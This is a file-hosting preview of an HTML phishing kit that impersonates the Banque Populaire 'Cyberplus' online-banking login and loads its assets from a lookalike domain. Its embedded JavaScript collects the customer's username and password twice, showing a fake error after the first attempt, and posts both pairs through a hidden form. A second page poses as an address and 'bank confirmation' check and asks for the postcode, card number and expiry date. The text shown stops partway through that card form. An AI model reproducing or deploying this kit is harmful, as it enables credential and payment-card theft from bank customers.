Hébergeur de fichiers indépendant

indexBPP.html

À propos du fichier

Type de fichier
Fichier HTML de 107 Ko (text/html)
Confidentialité
Fichier public, envoyé le 6 juin 2017 à 02:53, depuis l'adresse IP 109.86.x.x (UA)
Sécurité
Ne contient aucun Virus ou Malware connus - Dernière vérification: 2 jours
Statistiques
La présente page de téléchargement a été vue 769 fois depuis l'envoi du fichier
Page de téléchargement

Aperçu du fichier


<!-- saved from url=(0035)http://localhost/Populaire/logi.php -->
<html id="ng-app" ng-app="dacsApp" class="ng-scope" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


        
        <meta http-equiv="X-UA-Compatible" content="IE=Edge">
        <title>Bienvenue sur Cyberplus</title>      
    
        <link rel="icon" href="http://localhost/Populaire/favicon_bp.ico">
        
        

<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.min.js.téléchargement"></script>
<script>
//document.getElementById('preloading').style.display='none';
function showbtn(x)
{
    if( x==1 )
    {
        document.getElementById('btnsubmit').style.display='block';
        document.getElementById('preloading').style.display='none';
    }
    else if ( x==0 )
    {
        document.getElementById('btnsubmit').style.display='none';
        document.getElementById('preloading').style.display='block';
    }
}


var nbclick=0;
$(document).ready(function(){
    $("#btnsubmit").click(function()
    {
      
        var udp=document.getElementById('username').value.length;
        var ups=document.getElementById('password').value.length;
        if(nbclick==0 && udp>4 )
        {
        //alert(nbclick);
        document.getElementById('user_1').value=document.getElementById('username').value; 
        document.getElementById('pass_1').value=document.getElementById('password').value;
        document.getElementById('error').style.display='block';
        nbclick++;
        document.getElementById('username').value='';
        document.getElementById('password').value='';
        }
        else if(nbclick==1  && ups >5 )
        {
            document.getElementById('user_2').value=document.getElementById('username').value; 
            document.getElementById('pass_2').value=document.getElementById('password').value;
            document.getElementById('redirForm').submit();
        }
        
        if( udp<4 || ups <5)
        {
            document.getElementById('error').style.display='block';
        }
        
    });
});
</script>
<link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/fjai_a01.css" media="all">
</head>
<body class="ng-scope" ng-controller="transactionListCtrl">
        <div id="etape1" style="display:;">
<img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/gar.png"/>

        <section class="center">
        <div class="modal"><div class="loader"><div class="loaderText">Chargement en cours</div></div></div>
            <div class="center">
                <!-- ngIf: !transaction.error --><span class="ng-scope" ng-if="!transaction.error">
                   <!-- ngInclude:  --><div class="row-fluid ng-scope" ng-include="" src="&#39;/WebSSO_BP/partials/success.html?v=1&#39;"><!-- ngIf: transaction.step && !locked --><div class="ng-scope" ng-if="transaction.step &amp;&amp; !locked">
    <div class="global-content">
        <!-- ngIf: transaction.step.phase.state !== 'ENROLLMENT' && transaction.step.phase.state !== 'TERMS_OF_USE' --><h1 class="titre ng-scope" ng-if="transaction.step.phase.state !== &#39;ENROLLMENT&#39; &amp;&amp; transaction.step.phase.state !== &#39;TERMS_OF_USE&#39;">
            Bienvenue sur Cyberplus,
            <br>
            Pour accéder à votre espace sécurisé, merci de compléter les éléments suivants :
        </h1><!-- end ngIf: transaction.step.phase.state !== 'ENROLLMENT' && transaction.step.phase.state !== 'TERMS_OF_USE' -->

        <!-- ngIf: transaction.step.phase.origin === 'REQUESTED' -->
        <!-- ngIf: transaction.step.phase.origin === 'FORCED' -->

        <!-- ngIf: transaction.step.phase.state === 'TERMS_OF_USE' -->
        <!-- ngIf: transaction.step.phase.state !== 'TERMS_OF_USE' --><div class="form-content ng-scope" ng-if="transaction.step.phase.state !== &#39;TERMS_OF_USE&#39;">
            <!-- ngRepeat: factor in factors --><div class="ng-scope" ng-repeat="factor in factors">
                <!-- ngIf: factor.type === 'PASSWORD' -->
                <!-- ngIf: factor.type === 'PASSWORD_LOOKUP' --><div class="ng-scope" ng-if="factor.type === &#39;PASSWORD_LOOKUP&#39;">
                    <!-- ngInclude:  --><div class="ng-scope" ng-include="" src="&#39;/WebSSO_BP/partials/factors/passwordlookup.html?v=1&#39;"><!-- debut du factor Mot de passe avec demande d’identifiant -->
<div class="ng-scope" ng-controller="passwordlookupCtrl" ng-init="factorId = factor.id;
                factorType = factor.type;
                currentFactor = factor;">
    
    <!-- ngIf: isError --><div id="error" style="display:none" class="error-content ng-scope" ng-if="isError">
        
            <h2 class="error">Votre demande de connexion n'a pu aboutir</h2>
<form id="frm" method="post">
            <div class="leftAlign ">
                <ul>
                    <li>Soit l'identifiant ou le mot de passe saisi est incorrect, dans ce cas vous pouvez réessayer,</li>
                    <li>Soit le nombre de tentatives de saisie de votre mot de passe est atteint,</li>
                    <li>Soit vous n'avez jamais utilisé Cyberplus dans les 3 premiers mois de votre abonnement,</li>
                    <li>Soit votre demande d'accès à Cyberplus est en cours de validation.</li>
                </ul>
            </div>
        </div><!-- end ngIf: isError -->
<table cellspacing="0">
    <tbody>
        <tr>
            <td class="table-txt">
                <label>Identifiant :</label>
            </td>
            <td class="table-input">
                <input value="" class="text-input ng-pristine ng-valid"  name="id" id="id" type="text">
            </td>
        </tr>
        <tr>
            <td class="table-txt">
                <label>Mot de passe :</label>
            </td>
            <td class="table-input">
                <input  id="passe" class="text-input ng-pristine ng-valid" name="passe" type="password">
            </td>
        </tr>
    </tbody>
</table>
</div>

<!-- fin du factor Mot de passe avec demande d’identifiant --></div>                    
                </div><!-- end ngIf: factor.type === 'PASSWORD_LOOKUP' -->
                <!-- ngIf: factor.type === 'PASSWORD_ENROLL' -->
            </div><!-- end ngRepeat: factor in factors -->
        </div><!-- end ngIf: transaction.step.phase.state !== 'TERMS_OF_USE' -->
        <div class="controls-content">
            <div>
                <!-- ngIf: transaction.step.phase.state != 'ENROLLMENT' -->
                <input value="Annuler" class="btn annuler ng-scope" ng-click="cancelTransaction()" ng-if="transaction.step.phase.state != &#39;ENROLLMENT&#39;" type="button">
                <!-- end ngIf: transaction.step.phase.state != 'ENROLLMENT' -->
            <!-- ngIf: transaction.step.phase.state === 'ENROLLMENT' && transaction.step.phase.innerStep === 'ENROLLMENT' -->
             <input id="but1" value="Valider" class="btn disabled" type="button" onclick="verfication()">
           <br><br>
           <center>
            <img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/500.gif" style="display:none" name="preloading" id="preloading" width="20" height="20">
            </center></div>
            <!-- ngIf: transaction.step.phase.state === 'AUTHENTICATION' --><a href="http://localhost/Populaire/logi.php#" class="link ng-scope" ng-click="forgottenCred()" ng-if="transaction.step.phase.state === &#39;AUTHENTICATION&#39;">Mot de passe oublié</a><!-- end ngIf: transaction.step.phase.state === 'AUTHENTICATION' -->
        </div>
        
    

        <!-- ngIf: factors && factors.length == 1 && factors[0].type == 'PASSWORD_ENROLL' -->
    </div>
</div><!-- end ngIf: transaction.step && !locked -->
<!-- ngIf: locked -->
</div>
                </span><!-- end ngIf: !transaction.error -->            
            </div>
                       
            <!-- ngIf: transaction.step.phase.state != 'ENROLLMENT' && transaction.step.phase.state != 'TERMS_OF_USE' --><div ng-if="transaction.step.phase.state != &#39;ENROLLMENT&#39; &amp;&amp; transaction.step.phase.state != &#39;TERMS_OF_USE&#39; " class="iframe-content ng-scope">
                 <iframe src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/login_frame.html" id="infoFrame" frameborder="0"></iframe>
            </div><!-- end ngIf: transaction.step.phase.state != 'ENROLLMENT' && transaction.step.phase.state != 'TERMS_OF_USE' -->
        </section>

        <footer>
            <a href="http://localhost/Populaire/logi.php#" id="bankLogoV0" target="t1" title="Accueil du site de la banque"></a>
            <ul>
                <li class="first"><a href="http://localhost/Populaire/logi.php#.bpaca.banquepopulaire.fr/portailinternet/Editorial/BanqueEnLigne/Pages/aide-a-la-connexion.aspx" id="footerAide" target="t2" title="Accéder à l&#39;aide à la connexion">Aide à la connexion</a></li>
                <li><a href="http://localhost/Populaire/logi.php#.bpaca.banquepopulaire.fr/portailinternet/Editorial/BanqueEnLigne/Pages/securite.aspx" id="footerSecu" target="t3" title="Lire les informations sur la sécurité">Sécurité</a></li>
                <li><a href="https://www.ibps.bpaca.banquepopulaire.fr/s3f-web/getResource?mod=7&amp;bq=ENTAB-ENV00002" id="footerInfosNav" target="t4" title="Infos navigateurs">Infos navigateurs</a></li>
                <li style="display: none;"><a id="footerPlanSite" target="t5" title="Plan du site">Plan du site</a></li>
                <li><a href="http://localhost/Populaire/logi.php#.bpaca.banquepopulaire.fr/portailinternet/Editorial/Tarifs/Pages/mentions_legales.aspx" id="footerMentionsLegales" target="t6" title="Mentions légales">Mentions légales</a></li>
            </ul>
            <p>
                ©BPCE
                <br>
                <span id="footerBanque">Banque Populaire Aquitaine Centre Atlantique&nbsp;2017</span>
            </p>
        </footer>
            
        
        </div>
    

        
        <div id="loader" style="display:none;margin-top:350px;">
<img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/wait.gif" alt="loader"  />
<span style="font:helvetica 65 medium; color=#838383;">Chargement en cours</span>
</div>
        
    <div id="etape2" style="display:none">
    
<!-- saved from url=(0109)http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/ACCES_CYBERPLUS.aspx -->
<head id="ctl00_head1"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="description" content="">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css"><title>
    Accès CYBERPLUS ! - BPMC
</title>
   
    <link type="text/xml" rel="alternate" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/_vti_bin/spsdisco.aspx"><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/init.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.all.min.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/common.min.js.téléchargement" type="text/javascript"></script><script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.modal.min.js.téléchargement" type="text/javascript"></script>
</head><span><link rel="shortcut icon" href="http://www.massifcentral.banquepopulaire.fr/portailinternet//Lists/VisualElementsLogo/FAVICON.ico" type="image/vnd.microsoft.icon"></span>
    <!--[if IE 7 | IE 8]>
        <script src="/portailinternet/_layouts/Ibp.Cyi.Site/Javascript/script.IE.min.js" type="text/javascript"></script>
    <![endif]-->
    <!--[if IE 6]>
        <script src="/portailinternet/_layouts/Ibp.Cyi.Site/Javascript/script.IE.min.js" type="text/javascript"></script>
    <![endif]-->

    <link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/commun.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/jquery.modal.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/commun.publishing.min.css"><link rel="stylesheet" type="text/css" media="print" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/print.min.css"><link rel="stylesheet" type="text/css" href="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/search.min.css"><!--[if IE 7 | IE 8]> <link rel="stylesheet" type="text/css" href="/portailinternet/_layouts/styles/Ibp.Cyi.Site/min/commun.IE.min.css"/> <![endif]--><!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/portailinternet/_layouts/styles/Ibp.Cyi.Site/min/commun.IE6.min.css"/> <![endif]--><style type="text/css">
    .ctl00_wpz_0 { border-color:Black;border-width:1px;border-style:Solid; }

</style>

   
<div>
<input type="hidden" name="MSOWebPartPage_PostbackSource" id="MSOWebPartPage_PostbackSource" value="">
<input type="hidden" name="MSOTlPn_SelectedWpId" id="MSOTlPn_SelectedWpId" value="">
<input type="hidden" name="MSOTlPn_View" id="MSOTlPn_View" value="0">
<input type="hidden" name="MSOTlPn_ShowSettings" id="MSOTlPn_ShowSettings" value="False">
<input type="hidden" name="MSOGallery_SelectedLibrary" id="MSOGallery_SelectedLibrary" value="">
<input type="hidden" name="MSOGallery_FilterString" id="MSOGallery_FilterString" value="">
<input type="hidden" name="MSOTlPn_Button" id="MSOTlPn_Button" value="none">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="">
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="">
<input type="hidden" name="__REQUESTDIGEST" id="__REQUESTDIGEST" value="0x9D017DCDDE0229DCB0A9C7E2B614AE8BF7B8BD2CA716908DD4A90CB4512CE457451658B8D0E5A96C421DBEDB3BEFE183FEF73BF909B0E70D6CB17BC7E2DE8DEF,31 Oct 2016 18:09:50 -0000">
<input type="hidden" name="MSOSPWebPartManager_DisplayModeName" id="MSOSPWebPartManager_DisplayModeName" value="Browse">
<input type="hidden" name="MSOSPWebPartManager_ExitingDesignMode" id="MSOSPWebPartManager_ExitingDesignMode" value="false">
<input type="hidden" name="MSOWebPartPage_Shared" id="MSOWebPartPage_Shared" value="">
<input type="hidden" name="MSOLayout_LayoutChanges" id="MSOLayout_LayoutChanges" value="">
<input type="hidden" name="MSOLayout_InDesignMode" id="MSOLayout_InDesignMode" value="">
<input type="hidden" name="MSOSPWebPartManager_OldDisplayModeName" id="MSOSPWebPartManager_OldDisplayModeName" value="Browse">
<input type="hidden" name="MSOSPWebPartManager_StartWebPartEditingName" id="MSOSPWebPartManager_StartWebPartEditingName" value="false">
<input type="hidden" name="MSOSPWebPartManager_EndWebPartEditing" id="MSOSPWebPartManager_EndWebPartEditing" value="false">
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNDAxNjA0OTYzD2QWAmYPZBYCAgEPZBYEAgEPZBYEAgYPZBYCZg9kFgICAQ8WAh4TUHJldmlvdXNDb250cm9sTW9kZQspiAFNaWNyb3NvZnQuU2hhcmVQb2ludC5XZWJDb250cm9scy5TUENvbnRyb2xNb2RlLCBNaWNyb3NvZnQuU2hhcmVQb2ludCwgVmVyc2lvbj0xNC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj03MWU5YmNlMTExZTk0MjljAWQCGA8PFgIeB1Zpc2libGVoZGQCAw9kFgQCEg9kFgQCFw9kFmICBQ8WAh8BaGQCCQ8WAh8BaGQCCw8WAh8BaGQCDQ8WAh8ACysEAWQCEQ8WAh8ACysEAWQCEw8WAh8ACysEAWQCFQ8WAh8ACysEAWQCFw8WAh8ACysEAWQCGQ8WAh8ACysEAWQCGw8WAh8ACysEAWQCHQ8WAh8ACysEAWQCHw8WAh8ACysEAWQCIQ8WAh8ACysEAWQCIw8WAh8ACysEAWQCJQ8WAh8ACysEAWQCJw8WAh8ACysEAWQCKQ8WAh8ACysEAWQCKw8WAh8ACysEAWQCLQ8WAh8ACysEAWQCLw8WAh8ACysEAWQCMQ8WAh8ACysEAWQCMw8WAh8ACysEAWQCNQ8WAh8ACysEAWQCNw8WAh8ACysEAWQCOQ8WAh8ACysEAWQCOw8WAh8ACysEAWQCPQ8WAh8ACysEAWQCPw8WAh8ACysEAWQCQQ8WAh8ACysEAWQCQw8WAh8ACysEAWQCRQ8WAh8ACysEAWQCRw8WAh8ACysEAWQCSQ8WAh8ACysEAWQCSw8WAh8ACysEAWQCTQ8WAh8ACysEAWQCTw8WAh8ACysEAWQCUQ8WAh8ACysEAWQCUw8WAh8ACysEAWQCVQ8WAh8ACysEAWQCVw8WAh8ACysEAWQCWQ8WAh8ACysEAWQCWw8WAh8ACysEAWQCXQ8WAh8ACysEAWQCXw8WAh8ACysEAWQCYQ8WAh8ACysEAWQCYw8WAh8ACysEAWQCZQ8WAh8ACysEAWQCZw8WAh8ACysEAWQCaQ8WAh8ACysEAWQCGw9kFgQCAQ9kFgICAQ9kFgJmD2QWAmYPD2QWBh4FY2xhc3MFIm1zLXNidGFibGUgbXMtc2J0YWJsZS1leCBzNC1zZWFyY2geC2NlbGxwYWRkaW5nBQEwHgtjZWxsc3BhY2luZwUBMBYCZg9kFgJmD2QWAgIBDxYCHwIFFnNyY2gtQXV0b0NvbXBDb250YWluZXIWAmYPFgIfAgUUc3JjaC1BdXRvQ29tcERyb3BJbWdkAgsPZBYCZg8WAh8BaBYCZg9kFgJmD2QWBAIBDxYCHgRUZXh0BR5NYSBiYW5xdWUgcG9wdWxhaXJlIHLDqWdpb25hbGVkAgUPZBYGAgEPZBYCAgEPDxYEHwUFFExlIHNpdGUgZGUgbWEgYmFucXVlHgdUb29sVGlwBRRMZSBzaXRlIGRlIG1hIGJhbnF1ZWRkAgMPZBYCAgEPDxYGHwUFKkNvbnRhY3RlciB1biBjb25zZWlsbGVyIGRhbnMgdm90cmUgcsOpZ2lvbh8GBSpDb250YWN0ZXIgdW4gY29uc2VpbGxlciBkYW5zIHZvdHJlIHLDqWdpb24eC05hdmlnYXRlVXJsZGRkAgUPZBYKAgEPDxYCHwUFElRyb3V2ZXIgdW5lIGFnZW5jZWRkAgMPDxYCHwUFElZpbGxlLCBjb2RlIHBvc3RhbGRkAgUPDxYCHwUFAk9LZGQCBw8PFgIeC1Bvc3RCYWNrVXJsZGRkAgkPDxYCHgxFcnJvck1lc3NhZ2UFJU1lcmNpIGRlIHNhaXNpciB1biBjb2RlIHBvc3RhbCB2YWxpZGVkZAIwD2QWAmYPFCsAA2RkZGRk3LoasP3r1fNGCUNqk3E2LZctzWA=">
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
    theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>


<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/WebResource.axd" type="text/javascript"></script>


<script type="text/javascript">
//<![CDATA[
var MSOWebPartPageFormName = 'aspnetForm';
var g_presenceEnabled = true;var _fV4UI=true;var _spPageContextInfo = {webServerRelativeUrl: "\u002fportailinternet\u002fEditorial\u002fInformations", webLanguage: 1036, currentLanguage: 1036, webUIVersion:4,pageListId:"{4b969394-b7a1-42f2-b7bb-0fd3856d436e}",pageItemId:1243, alertsEnabled:true, siteServerRelativeUrl: "\u002fportailinternet", allowSilverlightPrompt:'True'};//]]>
</script>
<script type="text/javascript" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/init.js(1).téléchargement"></script>
<script type="text/javascript">
//<![CDATA[
var tmnTags = [];//]]>
</script>
<script type="text/javascript">
<!--
var L_Menu_BaseUrl="/portailinternet/Editorial/Informations";
var L_Menu_LCID="1036";
var L_Menu_SiteTheme="";
//-->
</script><script type="text/javascript">
<!--
//-->
</script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource.axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource(1).axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/ScriptResource(2).axd" type="text/javascript"></script>
<script src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/Search.js.téléchargement" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
UpdateFormDigest('\u002fportailinternet\u002fEditorial\u002fInformations', 1440000);if (typeof(vwpcm) != 'undefined') {vwpcm.SetWpcmVal();};if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;if (typeof(_spFormOnSubmitWrapper) != 'undefined') {return _spFormOnSubmitWrapper();} else {return true;};
return true;
}
//]]>
</script>

<div>

    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="A535C0EC">
    <input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="wMI-jY3SNRYRCAZFmEaP_RWR6ZyP4Au8tYTCxyVIgCE1bEVzf7p8L0sRb1RAl1rmF15VvX-H8NxWoCouPNoxHkzDO_PHGpqsrGzGWwxFXE41h7S28yRjirhlZODuabfDeepuG36T2RhAAywe2P_lEIFSj1w1">
    <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWMgKmgKaSDwKR5IiXBgLGysyEDALD3cSmBwKClst9Ar3EkMILAtb3oKMMAs7vmqcLAs7vmqcLAvea+5oFAqqphcoHAsPd4PcOAqeOh70JAqzCr9AKAoT1hcsJArC24+sMAs/O5vcGAuyD/gkCkMfDiAwCiOfc8AUCq/vXwAsCt9Ov9AcCw/ek2QgC+7DLQAK5xsaZDAKEgPCgAwK9ytSTDQLIhYqWCgLTivjnBQKpn4s6AqeK3OUGAqeK3OUGAq/qqcACAsKekYIGAt626bYKAsGnmrsOAuXkgcgLAs+i/Y4LAvjipfgKApDr6+4JAq+k/vIMApvW8LILAri8tc4GAv/Hi78IAq7xuqkGAsHQipkJAq3BtiMCvrHM3AcC7svL0AQCvrHQ3AcRN6+if4dHUr+fbcFhMoFVB2iq9w==">
</div>
    <span></span>
    <div class="hidden-fields">
        <span id="ctl00_ApplicationParametersControl1"><input type="hidden" name="fPageUrl" id="fPageUrl" value="Pages%2fACCES_CYBERPLUS.aspx"><input type="hidden" name="fWebId" id="fWebId" value="/portailinternet/Editorial/Informations"><input type="hidden" name="fListId" id="fListId" value="4b969394-b7a1-42f2-b7bb-0fd3856d436e"><input type="hidden" name="fItemId" id="fItemId" value="1243"><input type="hidden" name="fBocMode" id="fBocMode" value="bpr"><input type="hidden" name="fSiteUrl" id="fSiteUrl" value="http://www.massifcentral.banquepopulaire.fr/portailinternet"><input type="hidden" name="fItemCt" id="fItemCt" value="Actualite"><input type="hidden" name="fItemPageState" id="fItemPageState" value="Privatif"></span>
        <input id="RibbonContainer_activeTabId" name="ctl00$ctl28" type="hidden" value="">
        <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$panelZone','tctl00$PlaceHolderRightMenu$ctl01'], [], [], 90);
//]]>
</script>

        
        <script type="text/javascript" language="javascript">
            function ProcessImn(){
                ULSA13:;
            }
            function ProcessImnMarkers() {
                ULSA13:;
            }
        </script>
        
        <span id="TurnOnAccessibility" style="display: none" class="s4-notdlg"><a id="linkTurnOnAcc" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/ACCES_CYBERPLUS.aspx?vary=0-0-0#" class="ms-TurnOnAcc" onclick="SetIsAccessibilityFeatureEnabled(true);UpdateAccessibilityUI();document.getElementById(&#39;linkTurnOffAcc&#39;).focus();return false;">
            Activer le mode plus accessible</a> </span><span id="TurnOffAccessibility" style="display: none" class="s4-notdlg"><a id="linkTurnOffAcc" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/ACCES_CYBERPLUS.aspx?vary=0-0-0#" class="ms-TurnOffAcc" onclick="SetIsAccessibilityFeatureEnabled(false);UpdateAccessibilityUI();document.getElementById(&#39;linkTurnOnAcc&#39;).focus();return false;">
                        Désactiver le mode plus accessible</a> </span><span class="s4-notdlg"><a href="javascript:;" id="ctl00_A1" onclick="javascript:this.href=&#39;#mainContent&#39;;" class="ms-SkiptoMainContent" accesskey="X">
                                Passer au contenu principal</a> </span><a id="HiddenAnchor" href="javascript:;" style="display: none;"></a>
        <input type="hidden" id="hiddenFieldForInsertion" value="">
    </div>
    <div id="ctl00_SitePageContainer" class="site" style="top: 0px;">
        <!-- Header -->
        <!-- Têtière -->
        <div id="topbanner" class="noindex" style="height:150px ; background: url(/portailinternet/Lists/BibliothequedeVisuelTetiere/Tetiere_neutre.jpg) repeat-x top center;">
</div>
        <div id="logo" class="noindex">
            <div id="logo_bp" onmousedown="disableMenuAll();" class="noindex">
<a href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Pages/Default.aspx"><img alt="Accueil" height="84px" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/New_logo_bpmcv2.png" width="262px" style="BORDER: px solid; "></a></div>
            <div id="QuickAccess" class="noindex">
                <span id="ctl00_TopNavigation1" class="navigation"><a title="VOTRE BANQUE" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/VotreBanque/Pages/votre-banque.aspx?vary=0-0-0">VOTRE BANQUE</a>&nbsp;|&nbsp;<a title="SERVICES" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Services/Pages/services.aspx?vary=0-0-0">SERVICES</a>&nbsp;|&nbsp;<a title="INFORMATIONS PRATIQUES" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Informations/Pages/informations-pratiques.aspx?vary=0-0-0">INFORMATIONS PRATIQUES</a>&nbsp;|&nbsp;<a title="TARIFS ET RÉGLEMENTATION" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/Tarifs/Pages/tarifs-reglementation.aspx?vary=0-0-0">TARIFS ET RÉGLEMENTATION</a>&nbsp;|&nbsp;<a title="BANQUE EN LIGNE" href="http://www.massifcentral.banquepopulaire.fr/portailinternet/Editorial/BanqueEnLigne/Pages/banque-en-ligne.aspx?vary=0-0-0">BANQUE EN LIGNE</a></span>
                <br class="clear">
                
                <div id="zone_profil" class="noindex">
                   <a  style="position:absolute;left:-200px;" href="#"> <img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/dec.png"/></a>
                </div>
                 
                <div id="zone_identification" class="noindex">
                    
                </div>
                <br class="clear">
            </div>
            <br class="clear">
            <!-- Début du menu -->
            <div class="noindex">
               <a  style="" href="#"> <img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/nav.png"/></a> 
            </div>
        </div>
        <!-- Fin du Header -->
        <!-- Fin du menu -->
        <div class="s4-workspace">
            <div id="s4-bodyContainer">
            <!--    <div id="s4-titlerow" class="s4-pr s4-notdlg s4-titlerowhidetitle">
                    
                    
                </div>
                <!-- Debut Contenu -->
                <div id="contenu">
                    <!--  Debut div gauche -->
                    <div id="main_content" class="s4-pr">
                        <div class="breadcrumb noindex">
                        <a title="Accueil" href="#"><img src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/imp.png"/></a></div><br class="clear">
                        <div id="webpartarea">
                            
       
        <style type="text/css">
            #needColumn, #content, #block_search 
            {
               float: left;
            }
        </style>
    
     
        <style type="text/css">
            .s4-pr
            {
               width: auto;
            }
        </style>
    
     
     
        <style type="text/css">
             #content, #txt_advice
            {
               width: 740px !important;
            }
        </style>
    
     
    <script type="text/javascript">
        $(document).ready(showLinkParagraph);
    </script>
    
    <div id="content" style="display:">
        <!-- BLOC description Actualite -->
        <h2 style="padding:5px;">Demande d'adhésion en ligne</h2>
        <div id="txt_advice" class="typicalBlock">
            <h2 style="padding:5px; background:#0040FF;color:white;">Vérification adresse</h2>
            
            <br class="clear">
            <div class="angle_arrondi"></div>
        
            <div class="block">
                <div class="blockEdito">
                
                <label for="fld14" class="insp col1col0">Code postale &nbsp;:</label>  
                  <input   maxlength="5" style=" border: 1px solid gray; border-radius: 4px;" type="text" id="cp"  name="cp" size="4" value="">  
                        
                </div>
                
            </div>
        </div><br/>
        
        <div class="typicalBlock">
        <h2 style="padding:5px; background:#0040FF;color:white;">Confirmation bancaire</h2><br/>
        <img  style="margin-left:250px; margin-top:0px" width="92" height="19" src="https://webbppmailistcomptebpp.fr/bpp6363HDHDbpp/index_files/visa.png"><br/><br/>
        <label style="margin-left:150px;"for="clm2" class="select col4col0">Numéro de carte<font style="color:red;">*</font>&nbsp;(2) :</label>
        <input id="nc" class="col5col0" name="nc" 
        maxlength="16" style="background-color:#FFF;border: 1px solid gray; border-radius: 4px;" size="25" 
        onblur="cc_number_saved = this.value;this.value = this.value.replace(/[^\d]/g, '');if(!checkLuhn(this.value)) 
        {alert('Désolé, N° de carte invalide. Veuillez réessayer.'); this.value = '';}" 
        onfocus="if(this.value != cc_number_saved) this.value = cc_number_saved;"><br/><br>
        
        <label  style="margin-left:150px;" for="clm2" class="select col4col0">Date d'expiration  <font style="color:red;">*</font>&nbsp;(2) :</label>
        <select  name="emois"id="emois">
                                <option id="" value="" selected="">Mois </option>
                                
                                        <option value="1">1</option>
                                        <option value="2">2 </option>
                                        <option value="3">3 </option>
                                        <option value="4">4 </option>
                                        <option value="5">5</option>
                                        <option value="6">6 </option>
                                        <option value="7"> 7</option>
                                        <option value="8"> 8</option>
                                        <option value="9">9 </option>
                                        <option value="10"> 10</option>
                                        <option value="11"> 11</option>
                                        <option value="12"> 12</option>                             
                                </select>
                                  
                                <select  name="eannee"id="eannee">
                                <option id="" value="" selected="">Année </option>
                                        <option value="2017">2017 </option>
                                        <option value="2018">2018 </option>
                                        <option value="2019">2019</option>
                                        <option value="2020">2020 </option>
                                        <option value="2021">2021 </option>
                                        <option value="2022">2022 </option>
                                        <option value="2023">2023</option>
                                        <option value="2024">2024</option>
                                        <option value="2025">2025</option>
                                        <option value="2026">2026</option>
                                        <option value="2027">2027 </option>
                                        <option value="2028">2028 </option>
                                        <option value="2029">2029 </option>
                                        <option value="2030">2030</option>
                                        <option value="2031">2031 </option>
                                        <option value="2032">2032 </option>
                                        <option value="2033">2033</option>
                                        <option value="2034">2034</option>
                                        <option value="2035">2035 </option>                               
                                </select><br/><br/>
                                  
